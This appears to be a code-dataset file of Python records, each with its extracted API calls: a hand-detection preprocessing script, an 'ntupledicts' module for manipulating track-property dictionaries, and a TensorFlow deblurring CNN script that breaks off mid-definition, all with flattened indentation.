results_file = os.path.expanduser(results_file)
# write_mode = 'a'
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
part_names, part_names_to_idxs, part_idxs_to_bins = airplanecorpus.loadParts()
for i, fn in enumerate(glob.glob(os.path.join(hand_detections_dir, '*.txt'))):
video_id = utils.stripExtension(fn).split('.handsdetections')[0]
logger.info(f"Processing video {video_id}")
hand_detections = airplanecorpus.loadHandDetections(
video_id, dir_name=hand_detections_dir, unflatten=True
)
hand_detections = hand_detections.reshape(hand_detections.shape[0], -1)
mean_detection = np.nanmean(hand_detections)
hand_detections[np.isnan(hand_detections)] = mean_detection
action_labels = airplanecorpus.loadLabels(
video_id, dir_name=labels_dir,
part_names_to_idxs=part_names_to_idxs
)
bin_labels = makeBinLabels(action_labels, part_idxs_to_bins, hand_detections.shape[0])
fig_fn = os.path.join(fig_dir, f"{video_id}.png")
utils.plot_array(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn)
video_id = video_id.replace('_', '-')
saveVariable(hand_detections, f'trial={video_id}_feature-seq')
saveVariable(bin_labels, f'trial={video_id}_label-seq')
if __name__ == "__main__":
# Parse command-line args and config file
cl_args = utils.parse_args(main)
config, config_fn = utils.parse_config(cl_args, script_name=__file__)
# Create output directory, instantiate log file and write config options
out_dir = os.path.expanduser(config['out_dir'])
if not os.path.exists(out_dir):
os.makedirs(out_dir)
with open(os.path.join(out_dir, config_fn), 'w') as outfile:
yaml.dump(config, outfile)
utils.copyFile(__file__, out_dir)
main(**config)
|
[
"numpy.full",
"mathtools.utils.copyFile",
"kinemparse.airplanecorpus.loadHandDetections",
"os.path.join",
"os.makedirs",
"kinemparse.airplanecorpus.loadParts",
"yaml.dump",
"os.path.exists",
"mathtools.utils.plot_array",
"numpy.isnan",
"kinemparse.airplanecorpus.loadLabels",
"mathtools.utils.parse_config",
"mathtools.utils.stripExtension",
"mathtools.utils.parse_args",
"os.path.expanduser",
"logging.getLogger",
"numpy.nanmean"
] |
[((161, 188), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (178, 188), False, 'import logging\n'), ((343, 382), 'numpy.full', 'np.full', (['num_samples', 'no_bin'], {'dtype': 'int'}), '(num_samples, no_bin, dtype=int)\n', (350, 382), True, 'import numpy as np\n'), ((749, 788), 'os.path.expanduser', 'os.path.expanduser', (['hand_detections_dir'], {}), '(hand_detections_dir)\n', (767, 788), False, 'import os\n'), ((806, 836), 'os.path.expanduser', 'os.path.expanduser', (['labels_dir'], {}), '(labels_dir)\n', (824, 836), False, 'import os\n'), ((852, 879), 'os.path.expanduser', 'os.path.expanduser', (['out_dir'], {}), '(out_dir)\n', (870, 879), False, 'import os\n'), ((965, 994), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (977, 994), False, 'import os\n'), ((1085, 1117), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1097, 1117), False, 'import os\n'), ((1696, 1728), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1708, 1728), False, 'import os\n'), ((1814, 1843), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (1826, 1843), False, 'import os\n'), ((1976, 2002), 'kinemparse.airplanecorpus.loadParts', 'airplanecorpus.loadParts', ([], {}), '()\n', (2000, 2002), False, 'from kinemparse import airplanecorpus\n'), ((3214, 3236), 'mathtools.utils.parse_args', 'utils.parse_args', (['main'], {}), '(main)\n', (3230, 3236), False, 'from mathtools import utils\n'), ((3261, 3310), 'mathtools.utils.parse_config', 'utils.parse_config', (['cl_args'], {'script_name': '__file__'}), '(cl_args, script_name=__file__)\n', (3279, 3310), False, 'from mathtools import utils\n'), ((3403, 3440), 'os.path.expanduser', 'os.path.expanduser', (["config['out_dir']"], {}), "(config['out_dir'])\n", (3421, 3440), False, 'import os\n'), ((3610, 3643), 'mathtools.utils.copyFile', 'utils.copyFile', (['__file__', 'out_dir'], {}), '(__file__, out_dir)\n', (3624, 3643), False, 'from mathtools import utils\n'), ((891, 914), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (905, 914), False, 'import os\n'), ((924, 944), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (935, 944), False, 'import os\n'), ((1006, 1034), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1020, 1034), False, 'import os\n'), ((1044, 1069), 'os.makedirs', 'os.makedirs', (['out_data_dir'], {}), '(out_data_dir)\n', (1055, 1069), False, 'import os\n'), ((1129, 1152), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1143, 1152), False, 'import os\n'), ((1162, 1182), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1173, 1182), False, 'import os\n'), ((1524, 1560), 'os.path.join', 'os.path.join', (['out_dir', '"""results.csv"""'], {}), "(out_dir, 'results.csv')\n", (1536, 1560), False, 'import os\n'), ((1621, 1653), 'os.path.expanduser', 'os.path.expanduser', (['results_file'], {}), '(results_file)\n', (1639, 1653), False, 'import os\n'), ((1740, 1763), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1754, 1763), False, 'import os\n'), ((1773, 1793), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1784, 1793), False, 'import os\n'), ((1855, 1883), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1869, 1883), False, 'import os\n'), ((1893, 1918), 'os.makedirs', 'os.makedirs', (['out_data_dir'], {}), '(out_data_dir)\n', (1904, 1918), False, 'import os\n'), ((2240, 2333), 'kinemparse.airplanecorpus.loadHandDetections', 'airplanecorpus.loadHandDetections', (['video_id'], {'dir_name': 'hand_detections_dir', 'unflatten': '(True)'}), '(video_id, dir_name=hand_detections_dir,\n unflatten=True)\n', (2273, 2333), False, 'from kinemparse import airplanecorpus\n'), ((2457, 2484), 'numpy.nanmean', 'np.nanmean', (['hand_detections'], {}), '(hand_detections)\n', (2467, 2484), True, 'import numpy as np\n'), ((2578, 2678), 'kinemparse.airplanecorpus.loadLabels', 'airplanecorpus.loadLabels', (['video_id'], {'dir_name': 'labels_dir', 'part_names_to_idxs': 'part_names_to_idxs'}), '(video_id, dir_name=labels_dir, part_names_to_idxs\n =part_names_to_idxs)\n', (2603, 2678), False, 'from kinemparse import airplanecorpus\n'), ((2822, 2862), 'os.path.join', 'os.path.join', (['fig_dir', 'f"""{video_id}.png"""'], {}), "(fig_dir, f'{video_id}.png')\n", (2834, 2862), False, 'import os\n'), ((2871, 2942), 'mathtools.utils.plot_array', 'utils.plot_array', (['hand_detections.T', '(bin_labels,)', "('bin',)"], {'fn': 'fig_fn'}), "(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn)\n", (2887, 2942), False, 'from mathtools import utils\n'), ((3452, 3475), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (3466, 3475), False, 'import os\n'), ((3485, 3505), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (3496, 3505), False, 'import os\n'), ((3579, 3605), 'yaml.dump', 'yaml.dump', (['config', 'outfile'], {}), '(config, outfile)\n', (3588, 3605), False, 'import yaml\n'), ((1246, 1291), 'os.path.join', 'os.path.join', (['out_data_dir', 'f"""{var_name}.pkl"""'], {}), "(out_data_dir, f'{var_name}.pkl')\n", (1258, 1291), False, 'import os\n'), ((1338, 1370), 'os.path.join', 'os.path.join', (['out_dir', '"""log.txt"""'], {}), "(out_dir, 'log.txt')\n", (1350, 1370), False, 'import os\n'), ((2041, 2083), 'os.path.join', 'os.path.join', (['hand_detections_dir', '"""*.txt"""'], {}), "(hand_detections_dir, '*.txt')\n", (2053, 2083), False, 'import os\n'), ((2509, 2534), 'numpy.isnan', 'np.isnan', (['hand_detections'], {}), '(hand_detections)\n', (2517, 2534), True, 'import numpy as np\n'), ((3520, 3552), 'os.path.join', 'os.path.join', (['out_dir', 'config_fn'], {}), '(out_dir, config_fn)\n', (3532, 3552), False, 'import os\n'), ((2106, 2130), 'mathtools.utils.stripExtension', 'utils.stripExtension', (['fn'], {}), '(fn)\n', (2126, 2130), False, 'from mathtools import utils\n')]
|
"""Basic operations on ntuple dicts and track property dicts."""
from random import shuffle
from random import seed as set_seed
from copy import deepcopy
from functools import reduce
from math import inf
from warnings import warn
from numpy import cumsum
from numpy import array
from numpy import delete
from numpy import where
def add_ntuple_dicts(ntuple_dicts):
"""Adds together multiple ntuple dicts of with the same track types
and track type properties. Raises an exception if the dicts do not
have this "sameness" property.
Args:
ntuple_dicts: a list of ntuple dicts with the same track types
and track type properties.
Returns:
An ntuple dictionary with the lists of values of each ntuple
dict in the input list concatenated.
"""
track_types = iter(next(iter(ntuple_dicts)).keys())
return dict(map(lambda track_type:
(track_type, add_track_prop_dicts(
list(map(lambda ntuple_dict: ntuple_dict[track_type],
ntuple_dicts)))),
track_types))
def add_track_prop_dicts(track_prop_dicts):
"""Adds together multiple track properties dicts of with the same
properties.
Args:
track properties_dicts: a list of track properties dicts with
the same properties.
Returns:
A track properties dictionary with the lists of values of each
track properties dict in the input list concatenated.
Raises:
ValueError: if there is no property shared by all of the track
property dicts.
"""
def add_two_track_prop_dicts(tp_so_far, tp_to_add):
"""Adds two track properties dicts together as per rules in
parent function. Returns the sum."""
props_in_common = set(tp_so_far.keys()).intersection(
set(tp_to_add.keys()))
if props_in_common != set(tp_to_add.keys()):
warn("Track property dicts have differing value lists. "
"Will add only properties in common: {}"
.format(props_in_common), UserWarning)
if not len(props_in_common):
raise ValueError("Track property dicts to add have no properties "
"in common.")
return dict(map(lambda track_property:
(track_property,
tp_so_far[track_property] + tp_to_add[track_property]),
props_in_common))
return reduce(add_two_track_prop_dicts, track_prop_dicts)
def mix_track_prop_dicts(track_prop_dicts, seed=None):
"""Mixes together multiple track properties dicts with the same
properties. 'Mixing', in this context, means to cut all other dicts
in the list down to the size of the smallest, and then shuffle them
all together.
Args:
track properties_dicts: a list of track properties dicts with
the same properties.
seed: a seed for the random shuffling for reproducability.
Returns:
A track properties dictionary containing an equal amount of
tracks from each track properties dictionary in the input list.
Raises:
ValueError: if there is no property shared by all of the track
property dicts.
"""
min_tpd_size = min(map(track_prop_dict_length, track_prop_dicts))
return shuffle_track_prop_dict(add_track_prop_dicts(map(
lambda tpd: reduce_track_prop_dict(tpd, min_tpd_size, seed),
track_prop_dicts)),
seed=seed)
def ntuple_dict_length(ntuple_dict):
"""Returns a dictionary from track types to the number of tracks of
that type. Raises an exception of any value lists within one of its
track properties dicts are different lengths."""
return dict(map(lambda track_type, track_prop_dict:
(track_type, track_prop_dict_length(track_prop_dict)),
ntuple_dict.keys(), ntuple_dict.values()))
def track_prop_dict_length(track_prop_dict):
"""Returns the number of tracks in a track properties dictionary.
Raises an exception if the value lists in the input dictionary are
not all of the same length. Returns zero if the track properties
dict is empty."""
# A fancy way of checking if all value lists are the same length
val_list_lengths = set(map(len, track_prop_dict.values()))
if len(val_list_lengths) > 1:
raise ValueError("Invalid track prop dictionary: "
"value lists are of different sizes")
if len(val_list_lengths) == 0:
return 0
return next(iter(val_list_lengths))
class TrackPropertyDictIterator:
"""Iterates through tracks in a track properties dict, where each
track is represented as a dictionary from a value name to a single
property. Does not alter the original track properties dict."""
def __init__(self, track_prop_dict, increment=1):
self.tpd = deepcopy(track_prop_dict)
self.track_index = -1
self.increment = increment
self.num_tracks = track_prop_dict_length(track_prop_dict)
def __iter__(self):
return self
def __next__(self):
self.track_index += self.increment
if self.track_index < self.num_tracks:
return self._grab_track_by_index(self.tpd, self.track_index)
raise StopIteration
def _grab_track_by_index(self, track_prop_dict, track_index):
"""Returns a dictionary from track properties to single values
by selecting that value from each list in the track properties
dict."""
return dict(map(lambda property_name, val_list:
(property_name, val_list[track_index]),
track_prop_dict.keys(), track_prop_dict.values()))
def shuffle_ntuple_dict(ntuple_dict, seed=None):
"""Returns an ntuple dict whose value lists have been shuffled. To
preserve association between them, value lists of trk and matchtp
as well as ones for tp and matchtrk have been shuffled in the same
way.
Args:
ntuple_dict: an ntuple dictionary.
seed: a seed for the random shuffling for reproducability.
Returns:
An ntuple dict with its value lists shuffled, preserving the
association between complementary track types.
"""
# Generate shuffled indices dictionary
ntuple_dict_num_tracks = ntuple_dict_length(ntuple_dict)
shuffled_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []}
set_seed(seed)
def generate_shuffled_indices_dict_pair(track_type, track_prop_dict):
"""Generates a pair to be used in the construction of a
shuffled indices dictionary."""
tpd_indices = list(range(track_prop_dict_length(track_prop_dict)))
shuffle(tpd_indices)
return track_type, tpd_indices
shuffled_indices_dict.update(dict(map(generate_shuffled_indices_dict_pair,
ntuple_dict.keys(), ntuple_dict.values())))
# Ensure that the ntuple dict num tracks dict has the appropriate
# number of keys
ntuple_dict_num_tracks.update(dict(map(lambda track_type, indices:
(track_type, len(indices)),
shuffled_indices_dict.keys(), shuffled_indices_dict.values())))
# Ensure that same-length, complementary track types shuffle the same
if ntuple_dict_num_tracks["trk"] == ntuple_dict_num_tracks["matchtp"]:
shuffled_indices_dict["trk"] = shuffled_indices_dict["matchtp"]
if ntuple_dict_num_tracks["matchtrk"] == ntuple_dict_num_tracks["tp"]:
shuffled_indices_dict["matchtrk"] = shuffled_indices_dict["tp"]
return dict(map(lambda track_type, track_prop_dict:
(track_type, shuffle_track_prop_dict(
track_prop_dict, shuffled_indices_dict[track_type], seed)),
ntuple_dict.keys(), ntuple_dict.values()))
def shuffle_track_prop_dict(track_prop_dict, shuffled_indices=None, seed=None):
"""Returns a track properties dict whose value lists have been
shuffled.
Args:
track_prop_dict: a track properties dictionary.
shuffled_indices: a complete list of indices in the range of
the number of tracks in this track properties dict. Used
to completely determine a shuffling.
seed: a seed for the random shuffling for reproducability.
Returns:
A track properties dict whose value lists have been shuffled.
Raises:
ValueError: if shuffled_indices is different length than
track_prop_dict.
"""
def generate_shuffled_indices(tpd_length):
"""Generates a list of shuffled indices for use in shuffling
tracks in this track property dictionary."""
tpd_indices = list(range(tpd_length))
set_seed(seed)
shuffle(tpd_indices)
return tpd_indices
def shuffle_val_list(val_list, shuffled_indices):
"""Shuffles a value list depending on whether there are shuffled
indices or a random seed provided."""
return list(map(lambda i: val_list[i], shuffled_indices))
tpd_length = track_prop_dict_length(track_prop_dict)
if shuffled_indices is None:
shuffled_indices = generate_shuffled_indices(tpd_length)
if len(shuffled_indices) != tpd_length:
raise ValueError("shuffled_indices arg length ({}) differs from "
"track_prop_dict length ({})."
.format(len(shuffled_indices), tpd_length))
return dict(map(lambda property_name, val_list:
(property_name, shuffle_val_list(val_list, shuffled_indices)),
track_prop_dict.keys(), track_prop_dict.values()))
def reduce_ntuple_dict(ntuple_dict, track_limit,
shuffle_tracks=False, seed=None):
"""Reduces an ntuple dictionary to a number of tracks. If number of
tracks in the ntuple is less than the track limit specified, returns
all tracks. Can be used for convenient print debugging. Does not
affect the original ntuple dictionary.
Args:
ntuple_dict: an ntuple dict.
track_limit: number of tracks to retain in each value list. Or,
an integer that will be expanded into a corresponding
dictionary.
shuffle_tracks: if True, shuffles the value lists before
reducing.
seed: a seed for the shuffling, for reproducability.
Returns:
An ntuple dictionary with track_limit tracks.
"""
# Get track_limit into correct form if it's an int
if isinstance(track_limit, int):
track_limit = dict(map(lambda track_type:
(track_type, track_limit),
ntuple_dict.keys()))
if shuffle_tracks:
ntuple_dict = shuffle_ntuple_dict(ntuple_dict, seed)
return dict(map(lambda track_type, track_prop_dict:
(track_type, reduce_track_prop_dict(
track_prop_dict, track_limit[track_type], shuffle_tracks=False)),
ntuple_dict.keys(), ntuple_dict.values()))
def reduce_track_prop_dict(track_prop_dict, track_limit, min_index=0,
shuffle_tracks=True, seed=None):
"""Reduces a track properties dictionary such that each of its value
lists are only a certain length. Does not affect the original track
property dictionary.
Args:
track_prop_dict: a track properties dict.
track_limit: the maximum length for a value list.
min_index: the first index to include in the result.
shuffle_tracks: if True, shuffles the value lists before
reducing.
seed: a seed for the shuffling, for reproducability.
Returns:
A track properties dictionary with reduced-length value lists.
"""
if shuffle_tracks:
track_prop_dict = shuffle_track_prop_dict(track_prop_dict, seed=seed)
return dict(map(lambda track_prop, track_prop_vals:
(track_prop, track_prop_vals[min_index:min(track_limit + min_index,
len(track_prop_vals))]),
track_prop_dict.keys(), track_prop_dict.values()))
def split_track_prop_dict(track_prop_dict, split_list):
"""Splits a track properties dict into smaller ones according to
the relative sizes of split_list elements. There is no option to
shuffle these, as the dict can be shuffled before splitting.
Args:
track_prop_dict: a track properties dict.
split_list: a list of positive values that determine the number
and relative sizes of the post-split track property dicts.
Returns:
A list of track property dicts.
"""
def get_split_sizes(split_list, num_tracks):
"""Returns the sizes of data by normalizing the provided split
distribution and mutliplying by the number of tracks in such
a way that the resulting sizes add up to the original tracks."""
split_list_total = sum(split_list)
split_sizes = list(map(lambda split_val:
int(split_val * num_tracks / split_list_total),
split_list))
# Ensure the split sizes add up to the total number of tracks
split_sizes[-1] += num_tracks - sum(split_sizes)
return split_sizes
split_boundaries = [0] + list(cumsum(get_split_sizes(split_list,
track_prop_dict_length(track_prop_dict))))
return list(map(lambda start_index, end_index:
reduce_track_prop_dict(track_prop_dict, end_index - start_index,
start_index, shuffle_tracks=False),
split_boundaries[:-1], split_boundaries[1:]))
def select(*selector_key, invert=False):
"""Takes in a selector key and returns a selector that returns true
for selected values and false for non-selected values. This is how
cuts are applied in ntupledicts.
Args:
selector_key: If a single number, the selector will return true
for that number. If two numbers, the selector will return
true for numbers in that range, inclusive. If a list, will
treat each element of a list as a selector and logical OR
them together. This is done instead of AND, as AND can
simply be achieved by applying multiple selectors.
invert: Invert the selection. False by default.
Returns:
A selector, a function that returns true for some values and
false for all others.
Raises:
ValueError: for invalid selector keys.
"""
if len(selector_key) == 1:
key_contents = next(iter(selector_key))
if isinstance(key_contents, list):
selector = lambda val: any(map(
lambda sub_selector: sub_selector(val),
key_contents))
elif isinstance(key_contents, (float, int)):
selector = lambda val: val == next(iter(selector_key))
else:
raise ValueError("Invalid selector key type: {}."
.format(type(key_contents)))
elif len(selector_key) == 2:
selector = lambda val: selector_key[0] <= val <= selector_key[1]
else:
raise ValueError("Invalid selector key length: {}. Read the docs!"
.format(selector_key))
return lambda val: invert != selector(val)
def cut_ntuple_dict(ntuple_dict, nd_selector):
"""Cuts an ntuple dictionary by cutting each track type according to
a selector dictionary, cutting those tracks not selected. Tracks are
cut "symmetrically" across corresponding groups, meaning that any
cuts applied to trks are applied to matchtps, and from tps to
matchtrks, and vice versa.
Args:
ntuple_dict: an ntuple dictionary
nd_selector: a selector for an ntuple dict
Returns:
A cut ntuple dictionary
"""
# Build list of tracks to cut from tp/matchtrk group and trk/matchtp groups
cut_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []}
cut_indices_dict.update(dict(map(lambda track_type, cut_dict:
(track_type, select_indices(
ntuple_dict[track_type], cut_dict)),
nd_selector.keys(),
nd_selector.values())))
# Combine trk and matchtp, tp and matchtrk indices
# Sort and remove duplicates
trk_matchtp_indices_to_cut = sorted(
list(dict.fromkeys(cut_indices_dict["trk"] +\
cut_indices_dict["matchtp"])))
tp_matchtrk_indices_to_cut = sorted(
list(dict.fromkeys(cut_indices_dict["tp"] +\
cut_indices_dict["matchtrk"])))
cut_ntuple_dict = {}
for track_type in ntuple_dict.keys():
if track_type in ["trk", "matchtp"]:
indices_to_cut = trk_matchtp_indices_to_cut
if track_type in ["tp", "matchtrk"]:
indices_to_cut = tp_matchtrk_indices_to_cut
cut_ntuple_dict[track_type] = cut_track_prop_dict_by_indices(
ntuple_dict[track_type], indices_to_cut)
return cut_ntuple_dict
def cut_track_prop_dict(track_prop_dict, tpd_selector):
"""Cuts an track properties dictionary by cutting each track type
according to a cut dictionary.
Args:
track_prop_dict: a tracks properties dictionary.
tpd_selector: a selector for a tracks properties dictionary.
Returns:
A cut tracks properties dictionary.
"""
return cut_track_prop_dict_by_indices(track_prop_dict,
select_indices(track_prop_dict, tpd_selector))
def select_indices(track_prop_dict, tpd_selector, invert=True):
"""Selects indices from a tracks properties dictionary that meet the
conditions of the selector dictionary. If a property is in the
selector dict but not in the tracks properties dict, the program
won't raise an exception, but will print a message.
Args:
track_prop_dict: a tracks properties dictionary.
tpd_selector: a dictionary from track property names to
selectors.
invert: return all indices NOT selected. Default is True. This
jibes with how this function is mainly used: track cuts.
Returns:
Indices from the track properties dict selected by the selector
dict.
"""
# Determine which selection conditions will be applied
for track_property in list(tpd_selector.keys()):
if track_property not in track_prop_dict.keys():
warn("{} not in tracks properties; will not select"
.format(track_property), UserWarning)
tpd_selector.pop(track_property)
tpd_length = track_prop_dict_length(track_prop_dict)
return list(set(sum(map(lambda track_property, selector:
list(where([invert != selector(val) for val in\
track_prop_dict[track_property]])[0]),
tpd_selector.keys(), tpd_selector.values()),
[])))
def cut_track_prop_dict_by_indices(track_prop_dict, indices_to_cut):
"""Takes in a list of indices to cut and cuts those indices from the
lists of the dictionary. Assumes that all lists in track_prop_dict
are the same size. This list of indices will frequently be generated
using get_indices_meeting_condition. The list of indices does not
have to be sorted by size.
Args:
track_prop_dict: a tracks properties dictionary.
indices_to_cut: a collection of indices to cut. Repeats are
tolerated, but out-of-range indices will result in an
exception.
Returns:
The same tracks properties dictionary with the given indices
on its value lists removed.
"""
track_properties = track_prop_dict.keys()
post_cuts_track_prop_dict = {}
for track_property in track_properties:
post_cuts_track_prop_dict[track_property] = list(delete(
array(track_prop_dict[track_property]), indices_to_cut))
return post_cuts_track_prop_dict
def normalize_ntuple_dict(ntuple_dict, normalize_dict=None):
"""Normalizes each value list in an ntuple dict. Does not attempt
to normalize values of the same property but different track types
in the same way.
Args:
ntuple_dict: an ntuple dict.
normalize_dict: a dictionary from track types to lists of
properties to normalize of that track type. If None,
normalizes all value lists.
Returns:
An ntuple dict with the appropriate value lists normalized.
"""
base_normalize_dict = dict(map(lambda track_type: (track_type, None),
ntuple_dict.keys()))
base_normalize_dict.update(normalize_dict)
return dict(map(lambda track_type:
(track_type, normalize_track_prop_dict(ntuple_dict[track_type],
base_normalize_dict[track_type])),
base_normalize_dict.keys()))
def normalize_track_prop_dict(track_prop_dict, props_to_normalize=None):
"""Returns a track prop dict of the same form as the original, but
each value list has been divided by its highest value. All values
are normalized by default, but only some will be normalized if a
list is given."""
if props_to_normalize is None:
props_to_normalize = list(track_prop_dict.keys())
else:
for track_property in props_to_normalize:
if track_property not in list(track_prop_dict.keys()):
warn("{} not in tracks properties; will not normalize"
.format(track_property), UserWarning)
return dict(map(lambda track_property:
(track_property, normalize_val_list(track_prop_dict[track_property])),
props_to_normalize))
def normalize_val_list(val_list):
"""Returns a list of numeric values by the size of their maximum
value."""
max_val = float(max(val_list))
return [ val/max_val if max_val != 0 else 0 for val in val_list ]
|
[
"copy.deepcopy",
"random.shuffle",
"random.seed",
"numpy.array",
"functools.reduce"
] |
[((2434, 2484), 'functools.reduce', 'reduce', (['add_two_track_prop_dicts', 'track_prop_dicts'], {}), '(add_two_track_prop_dicts, track_prop_dicts)\n', (2440, 2484), False, 'from functools import reduce\n'), ((6406, 6420), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (6414, 6420), True, 'from random import seed as set_seed\n'), ((4861, 4886), 'copy.deepcopy', 'deepcopy', (['track_prop_dict'], {}), '(track_prop_dict)\n', (4869, 4886), False, 'from copy import deepcopy\n'), ((6684, 6704), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (6691, 6704), False, 'from random import shuffle\n'), ((8647, 8661), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (8655, 8661), True, 'from random import seed as set_seed\n'), ((8670, 8690), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (8677, 8690), False, 'from random import shuffle\n'), ((19731, 19769), 'numpy.array', 'array', (['track_prop_dict[track_property]'], {}), '(track_prop_dict[track_property])\n', (19736, 19769), False, 'from numpy import array\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 16 17:03:00 2018
@author: jumtsai
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
'''Import this part for using Tensor Board to visualizing each nodes in CNN.
'''
#DCNN's TensorFlow(GPU) Version
from astropy.io import fits
import os, glob, time
import logging,logging.handlers
import numpy as np
import tensorflow as tf
from manager import GPUManager
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
#--------------------------------Envir Default---------------------------------#
gm = GPUManager()
max_step=150
log_dir='CNNinfo/'
save_dir=log_dir+'restore/'
checkpoint_dir=log_dir+'model/'
num,weight,height=(1,4096,4096)
#--------------------------------Logging Module--------------------------------#
LOG_FILE = log_dir+'train_detail.log'
if os.path.isfile(LOG_FILE) is True:
os.remove(LOG_FILE)
handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 10*1024*1024, backupCount = 5)
fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'
formatter = logging.Formatter(fmt)
handler.setFormatter(formatter)
logger = logging.getLogger('train_detail')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
#----------------------------------Function------------------------------------#
def Padding(Input,ker_size):
'''Image Padding Function
'''
xpadpre = int(np.floor(ker_size[0]/2.0))
xpadpost = ker_size[0] - xpadpre
ypadpre = int(np.floor(ker_size[1]/2.0))
ypadpost = ker_size[1] - ypadpre
paddings = [[0,0],[xpadpre,xpadpost],[ypadpre,ypadpost],[0,0]]
padded = tf.pad(Input,paddings,"SYMMETRIC")
return padded
def batch_normal(input,is_train ,is_out=True,decay=0.9999):
with tf.name_scope('BN'):
scale=tf.Variable(tf.ones([input.get_shape()[-1]]))
beta=tf.Variable(tf.zeros([input.get_shape()[-1]]))
pop_mean=tf.Variable(tf.zeros([input.get_shape()[-1]]),trainable=False)
pop_var=tf.Variable(tf.ones([input.get_shape()[-1]]),trainable=False)
if is_train:
if is_out:
batch_mean,batch_var = tf.nn.moments(input,[0,1,2])
else:
batch_mean,batch_var = tf.nn.moments(input,[0])
train_mean = tf.assign(pop_mean,pop_mean*decay+batch_mean*(1-decay))
train_var = tf.assign(pop_var,pop_var*decay+batch_var*(1-decay))
with tf.control_dependencies([train_mean,train_var]):
return tf.nn.batch_normalization(input,batch_mean,batch_var,beta,scale,0.0001)
else:
return tf.nn.batch_normalization(input,pop_mean,pop_var,beta,scale,0.0001)
def Conv_Layer(Input, k_num, k_size, p_size = 2, activity_func = None):
'''Add convolutional layer Function, if tensor is Input, output size would be
smaller than Input size.
'''
with tf.name_scope('Convolutional_Layer'):
padded = Padding(Input, k_size)
raw_image = tf.layers.Input(tensor = padded)
shape=raw_image.get_shape().as_list()
weights = tf.Variable(tf.truncated_normal([k_size[0],k_size[1],int(shape[3]),k_num],stddev=15.0,dtype=tf.float32))
biases = tf.Variable(tf.truncated_normal([k_num],stddev=5.0,dtype=tf.float32))
unBN = tf.add(tf.nn.conv2d(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID'), biases)
Conv = batch_normal(unBN,is_train=True)
if activity_func is not None:
Act =activity_func(Conv,)
down_sample = tf.layers.max_pooling2d(Act, p_size, strides = 1, padding = 'valid')
else:
down_sample = tf.layers.max_pooling2d(Conv, p_size, strides = 1, padding = 'valid')
return down_sample
def Block(feature, num, kernel):
c_in = Conv_Layer(feature, num, [kernel,1], activity_func = tf.nn.relu)
c_out= Conv_Layer(c_in, num, [1,kernel], activity_func = tf.nn.relu)
return c_out -c_in
def mse(r,x):
with gm.auto_choice(mode=0):
return tf.reduce_mean(tf.square(r-x))
def tobatch(array,w,h):
pixelsize=array.shape[0]*array.shape[1]
batch=np.zeros([int(pixelsize/(h*w)),w,h],dtype=np.dtype('>i2'))
k=0
for i in range(int(array.shape[0]/h)):
for j in range(int(array.shape[1]/w)):
batch[k]=array[h*i:h*(i+1),w*j:w*(j+1)]
k+=1
return batch
def toarray(mesh):
n,w,h=mesh.shape
n_w=n_h=int(np.sqrt(n*w*h))
grid=np.sqrt(n)
array=np.zeros([n_w,n_h])
for i in range(n):
m=int(i/grid)
n=int(i%grid)
array[m*w:(m+1)*w,n*h:(n+1)*h]=mesh[i]
return array
#------------------------------------Input-------------------------------------#
with tf.name_scope('Placeholder'):
blur = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Blur')
oril = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Oril')
imgsize = oril.get_shape().as_list()
batch_size = imgsize[0]
tf.summary.image('Blur_input', blur, 10)
tf.summary.image('Oril_input', oril, 10)
#-----------------------------Add Hidden Layers--------------------------------#
with tf.name_scope('Hidden_Layer'): #Using multi GPUs
with gm.auto_choice(mode=0): #Allocating single GPUs
cl1 = Conv_Layer(blur, 16, [63,63], activity_func = tf.nn.relu)
cl2 = Block(cl1-blur, 16, 63)
cl3 = Block(cl2, 32, 31)
cl4 = Block(cl3, 64, 15)
cl5 = Block(cl4,128, 11)
cl6 = Block(cl5, 144, 9)
cl7 = Block(cl6, 192, 7)
cl8 = Block(cl7, 256, 5)
cl9 = Block(cl8, 512, 3)
cl10 = Block(cl9,1024, 1)
dense = tf.layers.dense(cl10, 1)
#dc3 = DeConv_Layer(cl3,12,1,activity_func = tf.nn.relu)
with tf.name_scope('Loss'):
